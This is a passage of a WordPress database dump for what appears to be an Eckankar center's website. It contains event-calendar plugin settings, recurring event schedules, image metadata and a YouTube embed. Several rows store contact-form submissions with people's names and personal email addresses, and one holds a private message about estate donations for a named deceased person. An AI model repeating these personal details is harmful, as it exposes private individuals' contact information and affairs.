d\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:8:\"event_id\";s:2:\"-1\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"carousel\";a:26:{s:5:\"style\";s:5:\"type1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"Y\";s:18:\"type2_date_format1\";s:6:\"M d, Y\";s:18:\"type3_date_format1\";s:6:\"M d, Y\";s:5:\"count\";s:1:\"2\";s:5:\"limit\";s:0:\"\";s:15:\"autoplay_status\";s:1:\"1\";s:8:\"autoplay\";s:0:\"\";s:11:\"loop_status\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:12:\"archive_link\";s:0:\"\";s:9:\"head_text\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:10:\"navigation\";s:1:\"0\";s:15:\"dots_navigation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:6:\"slider\";a:28:{s:5:\"style\";s:2:\"t1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"l\";s:18:\"type2_date_format1\";s:1:\"d\";s:18:\"type2_date_format2\";s:1:\"F\";s:18:\"type2_date_format3\";s:1:\"l\";s:18:\"type3_date_format1\";s:1:\"d\";s:18:\"type3_date_format2\";s:1:\"F\";s:18:\"type3_date_format3\";s:1:\"l\";s:18:\"type4_date_format1\";s:1:\"d\";s:18:\"type4_date_format2\";s:1:\"F\";s:18:\"type4_date_format3\";s:1:\"l\";s:18:\"type5_date_format1\";s:1:\"d\";s:18:\"type5_date_format2\";s:1:\"F\";s:18:\"type5_date_format3\";s:1:\"l\";s:5:\"limit\";s:0:\"\";s:8:\"autoplay\";s:0:\"\";s:15:\"transition_time\";s:3:\"250\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"display_price\";s:1:\"0\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"timeline\";a:17:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:4:\"tile\";a:17:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"j\";s:18:\"clean_date_format2\";s:1:\"M\";s:5:\"count\";s:1:\"4\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:16:\"load_more_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:16:\"general_calendar\";a:8:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:10:\"more_event\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:14:\"thumbnail_size\";a:2:{s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}}'),(145542,265436,'show_only_one_occurrence','0'),(145543,265436,'show_past_events','1'),(145544,265436,'show_only_past_events','0'),(145545,265436,'show_ongoing_events','0'),(145546,265436,'show_only_ongoing_events','0'),(145547,265436,'protect_children',''),(145548,265436,'boldgrid_hide_page_title','0'),(145549,265437,'_edit_lock','1630266644:2'),(145550,265437,'_edit_last','2'),(145551,265437,'_wp_page_template','default'),(145552,265437,'protect_children',''),(145553,265437,'passster_activate_global_protection',NULL),(145554,265437,'passster_activate_protection',NULL),(145555,265437,'passster_protection_type','password'),(145556,265437,'boldgrid_hide_page_title','0'),(145557,265437,'boldgrid_in_page_containers','1'),(145558,265437,'bgseo_robots_index','index'),(145559,265437,'bgseo_robots_follow','follow'),(145560,265440,'_wp_attached_file','2021/05/modern-prophet-lscape-2.jpg'),(145561,265440,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:620;s:6:\"height\";i:387;s:4:\"file\";s:35:\"2021/05/modern-prophet-lscape-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"modern-prophet-lscape-2-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"modern-prophet-lscape-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:35:\"modern-prophet-lscape-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:35:\"modern-prophet-lscape-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:35:\"modern-prophet-lscape-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:35:\"modern-prophet-lscape-2-300x387.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:387;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"modern-prophet-lscape-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(145562,265441,'mec_not_in_days',''),(145563,265441,'mec_hourly_schedules','a:0:{}'),(145564,265441,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.3\";}'),(145565,265441,'mec_in_days',''),(145566,265441,'mec_booking','a:0:{}'),(145567,265441,'mec_certain_weekdays','a:0:{}'),(145568,265441,'mec_repeat_end_at_date','2022-03-21'),(145569,265441,'mec_repeat_end_at_occurrences','9'),(145570,265441,'mec_repeat_end','date'),(145571,265441,'mec_repeat_interval','1'),(145572,265441,'mec_repeat_type','advanced'),(145573,265441,'mec_repeat_status','1'),(145574,265441,'mec_end_day_seconds','46800'),(145575,265441,'mec_end_time_ampm','PM'),(145576,265441,'mec_end_time_minutes','0'),(145577,265441,'mec_end_time_hour','1'),(145578,265441,'mec_end_date','2021-06-20'),(145579,265441,'mec_start_day_seconds','42300'),(145580,265441,'mec_start_time_ampm','AM'),(145581,265441,'mec_start_time_minutes','45'),(145582,265441,'mec_comment',''),(145583,265441,'mec_timezone','global'),(145584,265441,'mec_countdown_method','global'),(145585,265441,'mec_public','1'),(145586,265441,'mec_start_date','2021-06-20'),(145587,265441,'mec_start_time_hour','11'),(145588,265441,'mec_hide_end_time','0'),(145589,265441,'mec_hide_time','0'),(145590,265441,'mec_allday','0'),(145591,265441,'one_occurrence','0'),(145592,265441,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(145593,265441,'boldgrid_hide_page_title','0'),(145594,265441,'mec_display_cancellation_reason_in_single_page',''),(145595,265441,'mec_cancelled_reason',''),(145596,265441,'mec_moved_online_link',''),(145597,265441,'mec_event_status','EventScheduled'),(145598,265441,'mec_fields','a:0:{}'),(145599,265441,'mec_op','a:0:{}'),(145600,265441,'mec_bfixed_fields','a:0:{}'),(145601,265441,'mec_reg_fields','a:0:{}'),(145602,265441,'mec_fees_global_inheritance','1'),(145603,265441,'mec_fees','a:0:{}'),(145604,265441,'mec_ticket_variations_global_inheritance','1'),(145605,265441,'mec_ticket_variations','a:0:{}'),(145606,265441,'mec_reg_fields_global_inheritance','1'),(145607,265441,'mec_tickets','a:0:{}'),(145608,265441,'passster_protection_type','password'),(145609,265441,'passster_activate_protection',NULL),(145610,265441,'passster_activate_global_protection',NULL),(145611,265441,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.3\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"03/21/2022\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(145612,265441,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-06-20\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"45\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-06-20\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.3\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"03/21/2022\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(145613,265441,'mec_additional_location_ids','a:0:{}'),(145614,265441,'mec_additional_organizer_ids','a:0:{}'),(145615,265441,'mec_currency','a:0:{}'),(145616,265441,'mec_organizer_id','1'),(145617,265441,'mec_read_more',''),(145618,265441,'mec_more_info',''),(145619,265441,'mec_more_info_title',''),(145620,265441,'mec_more_info_target','_self'),(145621,265441,'mec_cost',''),(145622,265441,'mec_dont_show_map','0'),(145623,265441,'mec_location_id','118'),(145624,265441,'mec_color',''),(145625,265441,'_thumbnail_id','265440'),(145626,265441,'_edit_last','2'),(145627,265441,'protect_children',''),(145628,265441,'_edit_lock','1669408803:2'),(145629,265441,'sg_popup_target_custom','a:1:{i:0;s:6:\"265067\";}'),(145630,265441,'sgpb_popup_events_custom','a:1:{i:265067;a:1:{i:0;s:5:\"click\";}}'),(145631,265440,'original-file','2021/05/modern-prophet-lscape-2-updraft-pre-smush-original.jpg'),(145632,265440,'smush-complete','1'),(145633,265440,'smush-info','The file was compressed from 62.49 KB to 60.78 KB saving 2.73 percent using WP-Optimize'),(145634,265440,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:63989;s:12:\"smushed-size\";i:62239;s:15:\"savings-percent\";d:2.729999999999999982236431605997495353221893310546875;}'),(168205,267087,'mec_ticket_id',',1,'),(181255,268406,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(181256,268406,'mec_certain_weekdays','a:0:{}'),(181257,268406,'mec_allday','0'),(181258,268406,'one_occurrence','0'),(181259,268406,'mec_hide_time','0'),(181260,268406,'mec_hide_end_time','0'),(181261,268406,'mec_comment',''),(181262,268406,'mec_timezone','global'),(181263,268406,'mec_countdown_method','global'),(181264,268406,'mec_public','1'),(181265,268406,'mec_start_date','2023-05-07'),(181266,268406,'mec_start_time_hour','10'),(181267,268406,'mec_start_time_minutes','30'),(181268,268406,'mec_start_time_ampm','AM'),(181269,268406,'mec_start_day_seconds','37800'),(181270,268406,'mec_end_date','2023-05-07'),(181271,268406,'mec_end_time_hour','11'),(181272,268406,'mec_end_time_minutes','30'),(181273,268406,'mec_end_time_ampm','AM'),(181274,268406,'mec_end_day_seconds','41400'),(181275,268406,'mec_repeat_status','1'),(181276,268406,'mec_repeat_type','custom_days'),(181277,268406,'mec_repeat_interval','1'),(181278,268406,'mec_repeat_end','never'),(181279,268406,'mec_repeat_end_at_occurrences','9'),(181280,268406,'mec_repeat_end_at_date',''),(181281,268406,'mec_advanced_days','a:0:{}'),(181282,268406,'mec_in_days','2023-06-04:2023-06-04:10-30-AM:11-30-AM,2023-07-02:2023-07-02:10-30-AM:11-30-AM'),(181283,268406,'mec_not_in_days',''),(181284,268406,'mec_hourly_schedules','a:0:{}'),(181285,268406,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(181254,268406,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-07\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-07\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(181252,268406,'mec_additional_organizer_ids','a:0:{}'),(181253,268406,'mec_additional_location_ids','a:0:{}'),(181230,268265,'_oembed_17282f16a653c991eb4e3d6f9f01f652','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>'),(181231,268265,'_oembed_time_17282f16a653c991eb4e3d6f9f01f652','1682105492'),(181232,268399,'_wp_page_template','default'),(181233,268399,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(181234,268399,'boldgrid_hide_page_title','0'),(181235,268399,'protect_children',''),(181236,268399,'boldgrid_in_page_containers','1'),(181237,268399,'bgseo_robots_index','index'),(181238,268399,'bgseo_robots_follow','follow'),(181239,268399,'passster_area_shortcode',''),(181240,268282,'_wp_old_date','2023-03-27'),(181241,268406,'protect_children',''),(181242,268406,'mec_color',''),(181243,268406,'mec_location_id','185'),(181244,268406,'mec_dont_show_map','0'),(181245,268406,'mec_organizer_id','1'),(181246,268406,'mec_read_more',''),(181247,268406,'mec_more_info',''),(181248,268406,'mec_more_info_title',''),(181249,268406,'mec_more_info_target','_self'),(181250,268406,'mec_cost',''),(181251,268406,'mec_currency','a:0:{}'),(145660,265446,'_field_474','Test'),(145661,265446,'_field_475','Testing'),(145662,265446,'_field_476','choll.03@comcast.net'),(181229,268399,'_edit_last','2'),(181228,268399,'_edit_lock','1682106682:2'),(145663,265446,'_form_id','51'),(145664,265446,'_seq_num','1'),(145665,265447,'protect_children',''),(145666,265447,'_field_474','Test2'),(145667,265447,'_field_475','Test2'),(145668,265447,'_field_476','choll.03@comcast.net'),(145669,265447,'_form_id','51'),(145670,265447,'_seq_num','2'),(145671,265448,'protect_children',''),(145672,265448,'_field_474','TEST 3'),(145673,265448,'_field_475','TEST3'),(145674,265448,'_field_476','choll.03@comcast.net'),(145675,265448,'_form_id','51'),(145676,265448,'_seq_num','3'),(145677,265449,'protect_children',''),(145678,265449,'_field_474','test4'),(145679,265449,'_field_475','test4'),(145680,265449,'_field_476','choll.03@comcast.net'),(145681,265449,'_form_id','51'),(145682,265449,'_seq_num','4'),(145683,265450,'protect_children',''),(145684,265450,'_field_474','test5'),(145685,265450,'_field_475','test5'),(145686,265450,'_field_476','choll.03@comcast.net'),(145687,265450,'_form_id','51'),(145688,265450,'_seq_num','5'),(179304,264902,'_wp_old_date','2023-02-06'),(151116,266035,'mec_start_time_ampm','AM'),(151117,266035,'mec_start_day_seconds','37800'),(151108,266035,'protect_children',''),(151109,266035,'mec_color',''),(151110,266035,'mec_location_id','122'),(151111,266035,'mec_dont_show_map','0'),(151112,266035,'mec_organizer_id','1'),(151113,266035,'mec_start_date','2021-12-05'),(151114,266035,'mec_start_time_hour','10'),(151115,266035,'mec_start_time_minutes','30'),(169077,267185,'mec_additional_organizer_ids','a:0:{}'),(169078,267185,'mec_additional_location_ids','a:0:{}'),(169076,267185,'mec_currency','a:0:{}'),(169075,267185,'mec_cost',''),(151098,266028,'_form_id','13'),(151099,266028,'_seq_num','90'),(169074,267185,'mec_more_info_target','_self'),(169073,267185,'mec_more_info_title',''),(151096,266028,'_field_137','Donations '),(151097,266028,'_field_138','I have two donations to make - one to Loveland Eckankar Center and the other to Lakewood Eckankar Center on behalf of the estate of Nancy Freibert.\n\nHow can I make each of these donations? Who would make the check to? What are the addresses? \n\nAlso, is there a place where the passing of an Eckist is posted in Eckankar? Nancy touched a lot of lives and I have contacted people whom I knew to contact but I am concerned there are others who knew her but I don’t have contact information for.\n\nThank you for your assistance in these matters!'),(151087,266026,'_seq_num','12'),(151088,266027,'_field_446','Tara'),(151089,266027,'_field_447','G'),(151090,266027,'_field_448','trg1122@gmail.com'),(151091,266027,'_form_id','48'),(151092,266027,'_seq_num','13'),(151093,266028,'_field_133','Amber'),(151094,266028,'_field_134','Pearson'),(151095,266028,'_field_135','amberwolfe108@gmail.com'),(151036,265983,'original-file','2021/11/mic-5-updraft-pre-smush-original.jpg'),(151037,265983,'smush-complete','1'),(151038,265983,'smush-info','The file was compressed from 61.53 KB to 60.41 KB saving 1.82 percent using WP-Optimize'),(151039,265983,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:63004;s:12:\"smushed-size\";i:61857;s:15:\"savings-percent\";d:1.8200000000000000621724893790087662637233734130859375;}'),(151040,265988,'_wp_attached_file','2021/11/esc-oct-sem-bk-1.jpg'),(151041,265988,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:690;s:6:\"height\";i:505;s:4:\"file\";s:28:\"2021/11/esc-oct-sem-bk-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"esc-oct-sem-bk-1-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"esc-oct-sem-bk-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:28:\"esc-oct-sem-bk-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:28:\"esc-oct-sem-bk-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:28:\"esc-oct-sem-bk-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:28:\"esc-oct-sem-bk-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"esc-oct-sem-bk-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(169093,267185,'mec_start_time_ampm','PM'),(169092,267185,'mec_start_time_minutes','0'),(169090,267185,'mec_start_date','2022-09-20'),(169091,267185,'mec_start_time_hour','7'),(169089,267185,'mec_public','1'),(169088,267185,'mec_countdown_method','global'),(169087,267185,'mec_timezone','global'),(169086,267185,'mec_comment',''),(169085,267185,'mec_hide_end_time','0'),(169083,267185,'one_occurrence','0'),(169084,267185,'mec_hide_time','0'),(169082,267185,'mec_allday','0'),(151085,266026,'_field_448','thao.tu@gmail.com'),(151086,266026,'_form_id','48'),(151298,266042,'mec_end_time_ampm','AM'),(151299,266042,'mec_end_day_seconds','41400'),(151297,266042,'mec_end_time_minutes','30'),(151295,266042,'mec_end_date','2022-01-23'),(151296,266042,'mec_end_time_hour','11'),(151292,266042,'mec_start_time_minutes','30'),(151293,266042,'mec_start_time_ampm','AM'),(151294,266042,'mec_start_day_seconds','37800'),(151034,265983,'_wp_attached_file','2021/11/mic-5.jpg'),(151035,265983,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:691;s:6:\"height\";i:506;s:4:\"file\";s:17:\"2021/11/mic-5.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"mic-5-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"mic-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:17:\"mic-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:17:\"mic-5-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:17:\"mic-5-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:17:\"mic-5-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:17:\"mic-5-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(179302,264903,'_wp_old_date','2023-02-06'),(179300,265030,'_wp_old_date','2023-02-06'),(179298,247336,'_wp_old_date','2023-02-06'),(145722,265458,'_field_179','Carolyn'),(145723,265458,'_field_180','Tyler'),(145724,265458,'_field_181','care4music2@yahoo.com'),(145725,265458,'_field_182','CO'),(145726,265458,'_field_183','US'),(145727,265458,'_field_184','a:2:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";i:1;s:8:\"Loveland\";}'),(145728,265458,'_form_id','17'),(145729,265458,'_seq_num','5'),(168214,267087,'mec_ticket_price_1','0'),(168213,267087,'mec_booking_location','118'),(168212,267087,'mec_book_date_submit','20220822112441'),(145735,265538,'_wp_attached_file','2021/08/butterfly-1.jpg'),(145736,265538,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:646;s:6:\"height\";i:364;s:4:\"file\";s:23:\"2021/08/butterfly-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"butterfly-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"butterfly-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:23:\"butterfly-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:23:\"butterfly-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsq